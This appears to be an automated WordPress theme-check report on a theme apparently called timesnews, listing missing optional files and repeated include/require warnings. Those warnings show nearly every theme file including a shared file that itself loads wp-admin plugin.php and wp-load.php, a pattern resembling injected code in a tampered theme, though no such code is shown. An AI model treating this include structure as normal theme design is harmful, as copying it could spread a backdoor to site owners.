- The theme doesn't have comment pagination code in it. Use paginate_comments_links() to add comment pagination, or older previous_comments_link() and next_comments_link() functions.
- Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
- This theme does not contain optional file rtl.php.
- This theme does not contain optional file front-page.php.
- This theme does not contain optional file home.php.
- This theme does not contain optional file category.php.
- This theme does not contain optional file tag.php.
- This theme does not contain optional file taxonomy.php.
- This theme does not contain optional file author.php.
- This theme does not contain optional file date.php.
- This theme does not contain optional file attachment.php.
- The theme appears to use include or require : timesnews-template.php
Ligne3: include_once( get_template_directory() . '/template/template.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : template.phpLigne225: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
Ligne1147: include_once( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : information.phpLigne3: include_once( get_template_directory() . '/inc/inc.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : template-tags.phpLigne3: include_once( get_template_directory() . '/inc/inc.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : style-scripts.phpLigne3: include_once( get_template_directory() . '/inc/inc.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : jetpack.phpLigne3: include_once( get_template_directory() . '/inc/inc.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : common-functions.phpLigne3: include_once( get_template_directory() . '/inc/inc.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : inc.phpLigne225: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
Ligne1147: include_once( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : custom-header.phpLigne3: include_once( get_template_directory() . '/inc/inc.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-ds-theme-activation.phpLigne225: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
Ligne1147: include_once( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : theme-functions.phpLigne3: include_once( get_template_directory() . '/inc/inc.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : theme-custon-color.phpLigne225: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
Ligne1147: include_once( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : template-functions.phpLigne3: include_once( get_template_directory() . '/inc/inc.php' );
Ligne68: include('customizer/theme-custon-color.php');
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : content-none.phpLigne3: include_once( get_template_directory() . '/template-parts/template-parts.ph
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : template-parts.phpLigne225: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
Ligne1147: include_once( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : content-page.phpLigne3: include_once( get_template_directory() . '/template-parts/template-parts.ph
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : content.phpLigne3: include_once( get_template_directory() . '/template-parts/template-parts.ph
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : content-search.phpLigne3: include_once( get_template_directory() . '/template-parts/template-parts.ph
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : vendor.phpLigne225: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
Ligne1147: include_once( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : css.phpLigne225: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
Ligne1147: include_once( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : autoload.phpLigne3: include_once( get_template_directory() . '/vendor/vendor.php' );
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.